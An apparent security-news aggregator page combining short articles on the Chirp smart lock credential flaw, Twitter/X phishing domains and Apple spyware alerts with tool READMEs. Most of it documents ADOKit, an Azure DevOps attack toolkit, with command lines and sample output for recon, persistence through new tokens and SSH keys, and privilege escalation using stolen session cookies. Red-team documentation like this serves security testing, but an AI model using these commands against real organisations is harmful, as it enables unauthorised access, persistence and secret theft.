    • Progress bar when checking multiple URLs.
    • Save results to an output file.
    • Error handling for inaccessible URLs and invalid responses.
    • Command-line interface for easy usage.

    Installation

    1. Clone the repository:

    bash git clone https://github.com/your_username/status-checker.git cd status-checker

    1. Install dependencies:

    bash pip install -r requirements.txt

    Usage

    python status_checker.py [-h] [-d DOMAIN] [-l LIST] [-o OUTPUT] [-v] [-update]
    • -d, --domain: Single domain/URL to check.
    • -l, --list: File containing a list of domains/URLs to check.
    • -o, --output: File to save the output.
    • -v, --version: Display version information.
    • -update: Update the tool.

    Example:

    python status_checker.py -l urls.txt -o results.txt

    Preview:

    License

    This project is licensed under the MIT License - see the LICENSE file for details.



    How to Conduct Advanced Static Analysis in a Malware Sandbox

    Sandboxes are synonymous with dynamic malware analysis. They help to execute malicious files in a safe virtual environment and observe their behavior. However, they also offer plenty of value in terms of static analysis. See these five scenarios where a sandbox can prove to be a useful tool in your investigations. Detecting Threats in PDFs PDF files are frequently exploited by threat actors to

    Crickets from Chirp Systems in Smart Lock Key Leak

    The U.S. government is warning that “smart locks” securing entry to an estimated 50,000 dwellings nationwide contain hard-coded credentials that can be used to remotely open any of the locks. The lock’s maker Chirp Systems remains unresponsive, even though it was first notified about the critical weakness in March 2021. Meanwhile, Chirp’s parent company, RealPage, Inc., is being sued by multiple U.S. states for allegedly colluding with landlords to illegally raise rents.

    On March 7, 2024, the U.S. Cybersecurity & Infrastructure Security Agency (CISA) warned about a remotely exploitable vulnerability with “low attack complexity” in Chirp Systems smart locks.

    “Chirp Access improperly stores credentials within its source code, potentially exposing sensitive information to unauthorized access,” CISA’s alert warned, assigning the bug a CVSS (badness) rating of 9.1 (out of a possible 10). “Chirp Systems has not responded to requests to work with CISA to mitigate this vulnerability.”

    Matt Brown, the researcher CISA credits with reporting the flaw, is a senior systems development engineer at Amazon Web Services. Brown said he discovered the weakness and reported it to Chirp in March 2021, after the company that manages his apartment building started using Chirp smart locks and told everyone to install Chirp’s app to get in and out of their apartments.

    “I use Android, which has a pretty simple workflow for downloading and decompiling the APK apps,” Brown told KrebsOnSecurity. “Given that I am pretty picky about what I trust on my devices, I downloaded Chirp and after decompiling, found that they were storing passwords and private key strings in a file.”

    Using those hard-coded credentials, Brown found an attacker could then connect to an application programming interface (API) that Chirp uses which is managed by smart lock vendor August.com, and use that to enumerate and remotely lock or unlock any door in any building that uses the technology.

    Update, April 18, 11:55 a.m. ET: August has provided a statement saying it does not believe August or Yale locks are vulnerable to the hack described by Brown.

    “We were recently made aware of a vulnerability disclosure regarding access control systems provided by Chirp, using August and Yale locks in multifamily housing,” the company said. “Upon learning of these reports, we immediately and thoroughly investigated these claims. Our investigation found no evidence that would substantiate the vulnerability claims in either our product or Chirp’s as it relates to our systems.”

    Update, April 25, 2:45 p.m. ET: Based on feedback from Chirp, CISA has downgraded the severity of this flaw and revised their security advisory to say that the hard-coded credentials do not appear to expose the devices to remote locking or unlocking. CISA says the hardcoded credentials could be used by an attacker within the range of Bluetooth (~30 meters) “to change the configuration settings within the Bluetooth beacon, effectively removing Bluetooth visibility from the device. This does not affect the device’s ability to lock or unlock access points, and access points can still be operated remotely by unauthorized users via other means.”

    Brown said when he complained to his leasing office, they sold him a small $50 key fob that uses Near-Field Communications (NFC) to toggle the lock when he brings the fob close to his front door. But he said the fob doesn’t eliminate the ability for anyone to remotely unlock his front door using the exposed credentials and the Chirp mobile app.

    Also, the fobs pass the credentials to his front door over the air in plain text, meaning someone could clone the fob just by bumping against him with a smartphone app made to read and write NFC tags.

    Neither August nor Chirp Systems responded to requests for comment. It’s unclear exactly how many apartments and other residences are using the vulnerable Chirp locks, but multiple articles about the company from 2020 state that approximately 50,000 units use Chirp smart locks with August’s API.

    Roughly a year before Brown reported the flaw to Chirp Systems, the company was bought by RealPage, a firm founded in 1998 as a developer of multifamily property management and data analytics software. In 2021, RealPage was acquired by the private equity giant Thoma Bravo.

    Brown said the exposure he found in Chirp’s products is “an obvious flaw that is super easy to fix.”

    “It’s just a matter of them being motivated to do it,” he said. “But they’re part of a private equity company now, so they’re not answerable to anybody. It’s too bad, because it’s not like residents of [the affected] properties have another choice. It’s either agree to use the app or move.”

    In October 2022, an investigation by ProPublica examined RealPage’s dominance in the rent-setting software market, and that it found “uses a mysterious algorithm to help landlords push the highest possible rents on tenants.”

    “For tenants, the system upends the practice of negotiating with apartment building staff,” ProPublica found. “RealPage discourages bargaining with renters and has even recommended that landlords in some cases accept a lower occupancy rate in order to raise rents and make more money. One of the algorithm’s developers told ProPublica that leasing agents had ‘too much empathy’ compared to computer generated pricing.”

    Last year, the U.S. Department of Justice threw its weight behind a massive lawsuit filed by dozens of tenants who are accusing the $9 billion apartment software company of helping landlords collude to inflate rents.

    In February 2024, attorneys general for Arizona and the District of Columbia sued RealPage, alleging RealPage’s software helped create a rental monopoly.

    Toolkit - The Essential Toolkit For Reversing, Malware Analysis, And Cracking

    By: Zion3R


    This tool compilation is carefully crafted with the purpose of being useful both for the beginners and veterans from the malware analysis world. It has also proven useful for people trying their luck at the cracking underworld.

    It's the ideal complement to be used with the manuals from the site, and to play with the numbered theories mirror.


    Advantages

    To be clear, this pack is thought to be the most complete and robust in existence. Some of the pros are:

    1. It contains all the basic (and not so basic) tools that you might need in a real life scenario, be it a simple or a complex one.

    2. The pack is integrated with an Universal Updater made by us from scratch. Thanks to that, we get to mantain all the tools in an automated fashion.

    3. It's really easy to expand and modify: you just have to update the file bin\updater\tools.ini to integrate the tools you use to the updater, and then add the links for your tools to bin\sendto\sendto, so they appear in the context menus.

    4. The installer sets up everything we might need automatically - everything, from the dependencies to the environment variables, and it can even add a scheduled task to update the whole pack of tools weekly.

    Installation

    1. You can simply download the stable versions from the release section, where you can also find the installer.

    2. Once downloaded, you can update the tools with the Universal Updater that we specifically developed for that sole purpose.
      You will find the binary in the folder bin\updater\updater.exe.

    Tool set

    This toolkit is composed by 98 apps that cover everything we might need to perform reverse engineering and binary/malware analysis.
    Every tool has been downloaded from their original/official websites, but we still recommend you to use them with caution, specially those tools whose official pages are forum threads. Always exercise common sense.
    You can check the complete list of tools here.

    About contributions

    Pull Requests are welcome. If you'd want to propose big changes, you should first create an Issue about it, so we all can analyze and discuss it. The tools are compressed with 7-zip, and the format used for nomenclature is {name} - {version}.7z



    Apple Updates Spyware Alert System to Warn Victims of Mercenary Attacks

    Apple on Wednesday&nbsp;revised&nbsp;its documentation pertaining to its mercenary spyware threat notification system to mention that it alerts users when they may have been individually targeted by such attacks. It also specifically called out companies like NSO Group for developing commercial surveillance tools such as Pegasus that are used by state actors to pull off "individually targeted

    Twitter’s Clumsy Pivot to X.com Is a Gift to Phishers

    On April 9, Twitter/X began automatically modifying links that mention “twitter.com” to read “x.com” instead. But over the past 48 hours, dozens of new domain names have been registered that demonstrate how this change could be used to craft convincing phishing links — such as fedetwitter[.]com, which until very recently rendered as fedex.com in tweets.

    The message displayed when one visits goodrtwitter.com, which Twitter/X displayed as goodrx.com in tweets and messages.

    A search at DomainTools.com shows at least 60 domain names have been registered over the past two days for domains ending in “twitter.com,” although research so far shows the majority of these domains have been registered “defensively” by private individuals to prevent the domains from being purchased by scammers.

    Those include carfatwitter.com, which Twitter/X truncated to carfax.com when the domain appeared in user messages or tweets. Visiting this domain currently displays a message that begins, “Are you serious, X Corp?”

    Update: It appears Twitter/X has corrected its mistake, and no longer truncates any domain ending in “twitter.com” to “x.com.”

    Original story:

    The same message is on other newly registered domains, including goodrtwitter.com (goodrx.com), neobutwitter.com (neobux.com), roblotwitter.com (roblox.com), square-enitwitter.com (square-enix.com) and yandetwitter.com (yandex.com). The message left on these domains indicates they were defensively registered by a user on Mastodon whose bio says they are a systems admin/engineer. That profile has not responded to requests for comment.

    A number of these new domains including “twitter.com” appear to be registered defensively by Twitter/X users in Japan. The domain netflitwitter.com (netflix.com, to Twitter/X users) now displays a message saying it was “acquired to prevent its use for malicious purposes,” along with a Twitter/X username.

    The domain mentioned at the beginning of this story — fedetwitter.com — redirects users to the blog of a Japanese technology enthusiast. A user with the handle “amplest0e” appears to have registered space-twitter.com, which Twitter/X users would see as the CEO’s “space-x.com.” The domain “ametwitter.com” already redirects to the real americanexpress.com.

    Some of the domains registered recently and ending in “twitter.com” currently do not resolve and contain no useful contact information in their registration records. Those include firefotwitter[.]com (firefox.com), ngintwitter[.]com (nginx.com), and webetwitter[.]com (webex.com).

    The domain setwitter.com, which Twitter/X until very recently rendered as “sex.com,” redirects to this blog post warning about the recent changes and their potential use for phishing.

    Sean McNee, vice president of research and data at DomainTools, told KrebsOnSecurity it appears Twitter/X did not properly limit its redirection efforts.

    “Bad actors could register domains as a way to divert traffic from legitimate sites or brands given the opportunity — many such brands in the top million domains end in x, such as webex, hbomax, xerox, xbox, and more,” McNee said. “It is also notable that several other globally popular brands, such as Rolex and Linux, were also on the list of registered domains.”

    The apparent oversight by Twitter/X was cause for amusement and amazement from many former users who have migrated to other social media platforms since the new CEO took over. Matthew Garrett, a lecturer at U.C. Berkeley’s School of Information, summed up the Schadenfreude thusly:

    “Twitter just doing a ‘redirect links in tweets that go to x.com to twitter.com instead but accidentally do so for all domains that end x.com like eg spacex.com going to spacetwitter.com’ is not absolutely the funniest thing I could imagine but it’s high up there.”

    ADOKit - Azure DevOps Services Attack Toolkit

    By: Zion3R


    Azure DevOps Services Attack Toolkit - ADOKit is a toolkit that can be used to attack Azure DevOps Services by taking advantage of the available REST API. The tool allows the user to specify an attack module, along with specifying valid credentials (API key or stolen authentication cookie) for the respective Azure DevOps Services instance. The attack modules supported include reconnaissance, privilege escalation and persistence. ADOKit was built in a modular approach, so that new modules can be added in the future by the information security community.

    Full details on the techniques used by ADOKit are in the X-Force Red whitepaper.


    Installation/Building

    Libraries Used

    The below 3rd party libraries are used in this project.

    Library URL License
    Fody https://github.com/Fody/Fody MIT License
    Newtonsoft.Json https://github.com/JamesNK/Newtonsoft.Json MIT License

    Pre-Compiled

    • Use the pre-compiled binary in Releases

    Building Yourself

    Take the below steps to setup Visual Studio in order to compile the project yourself. This requires two .NET libraries that can be installed from the NuGet package manager.

    • Load the Visual Studio project up and go to "Tools" --> "NuGet Package Manager" --> "Package Manager Settings"
    • Go to "NuGet Package Manager" --> "Package Sources"
    • Add a package source with the URL https://api.nuget.org/v3/index.json
    • Install the Costura.Fody NuGet package.
    • Install-Package Costura.Fody -Version 3.3.3
    • Install the Newtonsoft.Json package
    • Install-Package Newtonsoft.Json
    • You can now build the project yourself!

    Command Modules

    • Recon
    • check - Check whether organization uses Azure DevOps and if credentials are valid
    • whoami - List the current user and its group memberships
    • listrepo - List all repositories
    • searchrepo - Search for given repository
    • listproject - List all projects
    • searchproject - Search for given project
    • searchcode - Search for code containing a search term
    • searchfile - Search for file based on a search term
    • listuser - List users
    • searchuser - Search for a given user
    • listgroup - List groups
    • searchgroup - Search for a given group
    • getgroupmembers - List all group members for a given group
    • getpermissions - Get the permissions for who has access to a given project
    • Persistence
    • createpat - Create personal access token for user
    • listpat - List personal access tokens for user
    • removepat - Remove personal access token for user
    • createsshkey - Create public SSH key for user
    • listsshkey - List public SSH keys for user
    • removesshkey - Remove public SSH key for user
    • Privilege Escalation
    • addprojectadmin - Add a user to the "Project Administrators" for a given project
    • removeprojectadmin - Remove a user from the "Project Administrators" group for a given project
    • addbuildadmin - Add a user to the "Build Administrators" group for a given project
    • removebuildadmin - Remove a user from the "Build Administrators" group for a given project
    • addcollectionadmin - Add a user to the "Project Collection Administrators" group
    • removecollectionadmin - Remove a user from the "Project Collection Administrators" group
    • addcollectionbuildadmin - Add a user to the "Project Collection Build Administrators" group
    • removecollectionbuildadmin - Remove a user from the "Project Collection Build Administrators" group
    • addcollectionbuildsvc - Add a user to the "Project Collection Build Service Accounts" group
    • removecollectionbuildsvc - Remove a user from the "Project Collection Build Service Accounts" group
    • addcollectionsvc - Add a user to the "Project Collection Service Accounts" group
    • removecollectionsvc - Remove a user from the "Project Collection Service Accounts" group
    • getpipelinevars - Retrieve any pipeline variables used for a given project.
    • getpipelinesecrets - Retrieve the names of any pipeline secrets used for a given project.
    • getserviceconnections - Retrieve the service connections used for a given project.

    Arguments/Options

    • /credential: - credential for authentication (PAT or Cookie). Applicable to all modules.
    • /url: - Azure DevOps URL. Applicable to all modules.
    • /search: - Keyword to search for. Not applicable to all modules.
    • /project: - Project to perform an action for. Not applicable to all modules.
    • /user: - Perform an action against a specific user. Not applicable to all modules.
    • /id: - Used with persistence modules to perform an action against a specific token ID. Not applicable to all modules.
    • /group: - Perform an action against a specific group. Not applicable to all modules.

    Authentication Options

    Below are the authentication options you have with ADOKit when authenticating to an Azure DevOps instance.

    • Stolen Cookie - This will be the UserAuthentication cookie on a user's machine for the .dev.azure.com domain.
    • /credential:UserAuthentication=ABC123
    • Personal Access Token (PAT) - This will be an access token/API key that will be a single string.
    • /credential:apiToken

    Module Details Table

    The below table shows the permissions required for each module.

    Attack Scenario Module Special Permissions? Notes
    Recon check No
    Recon whoami No
    Recon listrepo No
    Recon searchrepo No
    Recon listproject No
    Recon searchproject No
    Recon searchcode No
    Recon searchfile No
    Recon listuser No
    Recon searchuser No
    Recon listgroup No
    Recon searchgroup No
    Recon getgroupmembers No
    Recon getpermissions No
    Persistence createpat No
    Persistence listpat No
    Persistence removepat No
    Persistence createsshkey No
    Persistence listsshkey No
    Persistence removesshkey No
    Privilege Escalation addprojectadmin Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
    Privilege Escalation removeprojectadmin Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
    Privilege Escalation addbuildadmin Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
    Privilege Escalation removebuildadmin Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts
    Privilege Escalation addcollectionadmin Yes - Project Collection Administrator or Project Collection Service Accounts
    Privilege Escalation removecollectionadmin Yes - Project Collection Administrator or Project Collection Service Accounts
    Privilege Escalation addcollectionbuildadmin Yes - Project Collection Administrator or Project Collection Service Accounts
    Privilege Escalation removecollectionbuildadmin Yes - Project Collection Administrator or Project Collection Service Accounts
    Privilege Escalation addcollectionbuildsvc Yes - Project Collection Administrator, Project Colection Build Administrators or Project Collection Service Accounts
    Privilege Escalation removecollectionbuildsvc Yes - Project Collection Administrator, Project Colection Build Administrators or Project Collection Service Accounts
    Privilege Escalation addcollectionsvc Yes - Project Collection Administrator or Project Collection Service Accounts
    Privilege Escalation removecollectionsvc Yes - Project Collection Administrator or Project Collection Service Accounts
    Privilege Escalation getpipelinevars Yes - Contributors or Readers or Build Administrators or Project Administrators or Project Team Member or Project Collection Test Service Accounts or Project Collection Build Service Accounts or Project Collection Build Administrators or Project Collection Service Accounts or Project Collection Administrators
    Privilege Escalation getpipelinesecrets Yes - Contributors or Readers or Build Administrators or Project Administrators or Project Team Member or Project Collection Test Service Accounts or Project Collection Build Service Accounts or Project Collection Build Administrators or Project Collection Service Accounts or Project Collection Administrators
    Privilege Escalation getserviceconnections Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts

    Examples

    Validate Azure DevOps Access

    Use Case

    Perform authentication check to ensure that organization is using Azure DevOps and that provided credentials are valid.

    Syntax

    Provide the check module, along with any relevant authentication information and URL. This will output whether the organization provided is using Azure DevOps, and if so, will attempt to validate the credentials provided.

    ADOKit.exe check /credential:apiKey /url:https://dev.azure.com/organizationName

    ADOKit.exe check /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

    Example Output

    C:\>ADOKit.exe check /credential:apiKey /url:https://dev.azure.com/YourOrganization

    ==================================================
    Module: check
    Auth Type: API Key
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 3/28/2023 3:33:01 PM
    ==================================================


    [*] INFO: Checking if organization provided uses Azure DevOps

    [+] SUCCESS: Organization provided exists in Azure DevOps


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.

    3/28/23 19:33:02 Finished execution of check

    Whoami

    Use Case

    Get the current user and the user's group memberhips

    Syntax

    Provide the whoami module, along with any relevant authentication information and URL. This will output the current user and all of its group memberhips.

    ADOKit.exe whoami /credential:apiKey /url:https://dev.azure.com/organizationName

    ADOKit.exe whoami /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

    Example Output

    C:\>ADOKit.exe whoami /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization

    ==================================================
    Module: whoami
    Auth Type: Cookie
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/4/2023 11:33:12 AM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.

    Username | Display Name | UPN
    ------------------------------------------------------------------------------------------------------------------------------------------------------------
    jsmith | John Smith | jsmith@YourOrganization.onmicrosoft. com


    [*] INFO: Listing group memberships for the current user


    Group UPN | Display Name | Description
    --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    [YourOrganization]\Project Collection Test Service Accounts | Project Collection Test Service Accounts | Members of this group should include the service accounts used by the test controllers set up for this project collection.
    [TestProject2]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
    [MaraudersMap]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
    [YourOrganization]\Project Collection Administrators | Project Collection Administrators | Members of this application group can perform all privileged operations on the Team Project Collection.

    4/4/23 15:33:19 Finished execution of whoami

    List Repos

    Use Case

    Discover repositories being used in Azure DevOps instance

    Syntax

    Provide the listrepo module, along with any relevant authentication information and URL. This will output the repository name and URL.

    ADOKit.exe listrepo /credential:apiKey /url:https://dev.azure.com/organizationName

    ADOKit.exe listrepo /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

    Example Output

    C:\>ADOKit.exe listrepo /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

    ==================================================
    Module: listrepo
    Auth Type: Cookie
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 3/29/2023 8:41:50 AM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.

    Name | URL
    -----------------------------------------------------------------------------------
    TestProject2 | https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2
    MaraudersMap | https://dev.azure.com/YourOrganization/MaraudersMap/_git/MaraudersMap
    SomeOtherRepo | https://dev.azure.com/YourOrganization/Projec tWithMultipleRepos/_git/SomeOtherRepo
    AnotherRepo | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/AnotherRepo
    ProjectWithMultipleRepos | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/ProjectWithMultipleRepos
    TestProject | https://dev.azure.com/YourOrganization/TestProject/_git/TestProject

    3/29/23 12:41:53 Finished execution of listrepo

    Search Repos

    Use Case

    Search for repositories by repository name in Azure DevOps instance

    Syntax

    Provide the searchrepo module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the matching repository name and URL.

    ADOKit.exe searchrepo /credential:apiKey /url:https://dev.azure.com/organizationName /search:cred

    ADOKit.exe searchrepo /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:cred

    Example Output

    C:\>ADOKit.exe searchrepo /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"test"

    ==================================================
    Module: searchrepo
    Auth Type: API Key
    Search Term: test
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 3/29/2023 9:26:57 AM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.

    Name | URL
    -----------------------------------------------------------------------------------
    TestProject2 | https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2
    TestProject | https://dev.azure.com/YourOrganization/TestProject/_git/TestProject

    3/29/23 13:26:59 Finished execution of searchrepo

    List Projects

    Use Case

    Discover projects being used in Azure DevOps instance

    Syntax

    Provide the listproject module, along with any relevant authentication information and URL. This will output the project name, visibility (public or private) and URL.

    ADOKit.exe listproject /credential:apiKey /url:https://dev.azure.com/organizationName

    ADOKit.exe listproject /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

    Example Output

    C:\>ADOKit.exe listproject /credential:apiKey /url:https://dev.azure.com/YourOrganization

    ==================================================
    Module: listproject
    Auth Type: API Key
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/4/2023 7:44:59 AM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.

    Name | Visibility | URL
    -----------------------------------------------------------------------------------------------------
    TestProject2 | private | https://dev.azure.com/YourOrganization/TestProject2
    MaraudersMap | private | https://dev.azure.com/YourOrganization/MaraudersMap
    ProjectWithMultipleRepos | private | http s://dev.azure.com/YourOrganization/ProjectWithMultipleRepos
    TestProject | private | https://dev.azure.com/YourOrganization/TestProject

    4/4/23 11:45:04 Finished execution of listproject

    Search Projects

    Use Case

    Search for projects by project name in Azure DevOps instance

    Syntax

    Provide the searchproject module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the matching project name, visibility (public or private) and URL.

    ADOKit.exe searchproject /credential:apiKey /url:https://dev.azure.com/organizationName /search:cred

    ADOKit.exe searchproject /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:cred

    Example Output

    C:\>ADOKit.exe searchproject /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"map"

    ==================================================
    Module: searchproject
    Auth Type: API Key
    Search Term: map
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/4/2023 7:45:30 AM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.

    Name | Visibility | URL
    -----------------------------------------------------------------------------------------------------
    MaraudersMap | private | https://dev.azure.com/YourOrganization/MaraudersMap

    4/4/23 11:45:31 Finished execution of searchproject

    Search Code

    Use Case

    Search for code containing a given keyword in Azure DevOps instance

    Syntax

    Provide the searchcode module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the URL to the matching code file, along with the line in the code that matched.

    ADOKit.exe searchcode /credential:apiKey /url:https://dev.azure.com/organizationName /search:password

    ADOKit.exe searchcode /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:password

    Example Output

    C:\>ADOKit.exe searchcode /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /search:"password"

    ==================================================
    Module: searchcode
    Auth Type: Cookie
    Search Term: password
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 3/29/2023 3:22:21 PM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.


    [>] URL: https://dev.azure.com/YourOrganization/MaraudersMap/_git/MaraudersMap?path=/Test.cs
    |_ Console.WriteLine("PassWord");
    |_ this is some text that has a password in it

    [>] URL: https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2?path=/Program.cs
    |_ Console.WriteLine("PaSsWoRd");

    [*] Match count : 3

    3/29/23 19:22:22 Finished execution of searchco de

    Search Files

    Use Case

    Search for files in repositories containing a given keyword in the file name in Azure DevOps

    Syntax

    Provide the searchfile module and your search criteria in the /search: command-line argument, along with any relevant authentication information and URL. This will output the URL to the matching file in its respective repository.

    ADOKit.exe searchfile /credential:apiKey /url:https://dev.azure.com/organizationName /search:azure-pipeline

    ADOKit.exe searchfile /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:azure-pipeline

    Example Output

    C:\>ADOKit.exe searchfile /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /search:"test"

    ==================================================
    Module: searchfile
    Auth Type: Cookie
    Search Term: test
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 3/29/2023 11:28:34 AM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.

    File URL
    ----------------------------------------------------------------------------------------------------
    https://dev.azure.com/YourOrganization/MaraudersMap/_git/4f159a8e-5425-4cb5-8d98-31e8ac86c4fa?path=/Test.cs
    https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/c1ba578c-1ce1-46ab-8827-f245f54934e9?path=/Test.c s
    https://dev.azure.com/YourOrganization/TestProject/_git/fbcf0d6d-3973-4565-b641-3b1b897cfa86?path=/test.cs

    3/29/23 15:28:37 Finished execution of searchfile

    Create PAT

    Use Case

    Create a personal access token (PAT) for a user that can be used for persistence to an Azure DevOps instance.

    Syntax

    Provide the createpat module, along with any relevant authentication information and URL. This will output the PAT ID, name, scope, date valid til, and token content for the PAT created. The name of the PAT created will be ADOKit- followed by a random string of 8 characters. The date the PAT is valid until will be 1 year from the date of creation, as that is the maximum that Azure DevOps allows.

    ADOKit.exe createpat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

    Example Output

    C:\>ADOKit.exe createpat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

    ==================================================
    Module: createpat
    Auth Type: Cookie
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 3/31/2023 2:33:09 PM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.

    PAT ID | Name | Scope | Valid Until | Token Value
    ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
    8776252f-9e03-48ea-a85c-f880cc830898 | ADOKit- rJxzpZwZ | app_token | 3/31/2024 12:00:00 AM | tokenValueWouldBeHere

    3/31/23 18:33:10 Finished execution of createpat

    List PATs

    Use Case

    List all personal access tokens (PAT's) for a given user in an Azure DevOps instance.

    Syntax

    Provide the listpat module, along with any relevant authentication information and URL. This will output the PAT ID, name, scope, and date valid til for all active PAT's for the user.

    ADOKit.exe listpat /credential:apiKey /url:https://dev.azure.com/organizationName

    ADOKit.exe listpat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

    Example Output

    C:\>ADOKit.exe listpat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

    ==================================================
    Module: listpat
    Auth Type: Cookie
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 3/31/2023 2:33:17 PM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.

    PAT ID | Name | Scope | Valid Until
    -------------------------------------------------------------------------------------------------------------------------------------------
    9b354668-4424-4505-a35f-d0989034da18 | test-token | app_token | 4/29/2023 1:20:45 PM
    8776252f-9e03-48ea-a85c-f880cc8308 98 | ADOKit-rJxzpZwZ | app_token | 3/31/2024 12:00:00 AM

    3/31/23 18:33:18 Finished execution of listpat

    Remove PAT

    Use Case

    Remove a PAT for a given user in an Azure DevOps instance.

    Syntax

    Provide the removepat module, along with any relevant authentication information and URL. Additionally, provide the ID for the PAT in the /id: argument. This will output whether the PAT was removed or not, and then will list the current active PAT's for the user after performing the removal.

    ADOKit.exe removepat /credential:apiKey /url:https://dev.azure.com/organizationName /id:000-000-0000...

    ADOKit.exe removepat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /id:000-000-0000...

    Example Output

    C:\>ADOKit.exe removepat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /id:0b20ac58-fc65-4b66-91fe-4ff909df7298

    ==================================================
    Module: removepat
    Auth Type: Cookie
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/3/2023 11:04:59 AM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.


    [+] SUCCESS: PAT with ID 0b20ac58-fc65-4b66-91fe-4ff909df7298 was removed successfully.

    PAT ID | Name | Scope | Valid Until
    -------------------------------------------------------------------------------------------------------------------------------------------
    9b354668-4424-4505-a35f-d098903 4da18 | test-token | app_token | 4/29/2023 1:20:45 PM

    4/3/23 15:05:00 Finished execution of removepat

    Create SSH Key

    Use Case

    Create an SSH key for a user that can be used for persistence to an Azure DevOps instance.

    Syntax

    Provide the createsshkey module, along with any relevant authentication information and URL. Additionally, provide your public SSH key in the /sshkey: argument. This will output the SSH key ID, name, scope, date valid til, and last 20 characters of the public SSH key for the SSH key created. The name of the SSH key created will be ADOKit- followed by a random string of 8 characters. The date the SSH key is valid until will be 1 year from the date of creation, as that is the maximum that Azure DevOps allows.

    ADOKit.exe createsshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /sshkey:"ssh-rsa ABC123"

    Example Output

    C:\>ADOKit.exe createsshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /sshkey:"ssh-rsa ABC123"

    ==================================================
    Module: createsshkey
    Auth Type: Cookie
    Search Term:
    Target URL: https://dev.azure.com/YourOrganization

    Timestamp: 4/3/2023 2:51:22 PM
    ==================================================


    [*] INFO: Checking credentials provided

    [+] SUCCESS: Credentials provided are VALID.

    SSH Key ID | Name | Scope | Valid Until | Public SSH Key
    -----------------------------------------------------------------------------------------------------------------------------------------------------------------------
    fbde9f3e-bbe3-4442-befb-c2ddeab75c58 | ADOKit-iCBfYfFR | app_token | 4/3/2024 12:00:00 AM | ...hOLNYMk5LkbLRMG36RE=

    4/3/23 18:51:24 Finished execution of createsshkey

    List SSH Keys

    Use Case

    List all public SSH keys for a given user in an Azure DevOps instance.

    Syntax

    Provide the listsshkey module, along with any relevant authentication information and URL. This will output the SSH Key ID, name, scope, and date valid til for all active SSH key's for the user. Additionally, it will print the last 20 characters of the public SSH key.

    ADOKit.exe listsshkey /credential:apiKey /url:https://dev.azure.com/organizationName

    ADOKit.exe listsshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName

    Example Output

    C:\>ADOKit.exe listsshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization

    ==================================================
    Module: listsshkey
    Auth Type: Cookie
    Search Term:
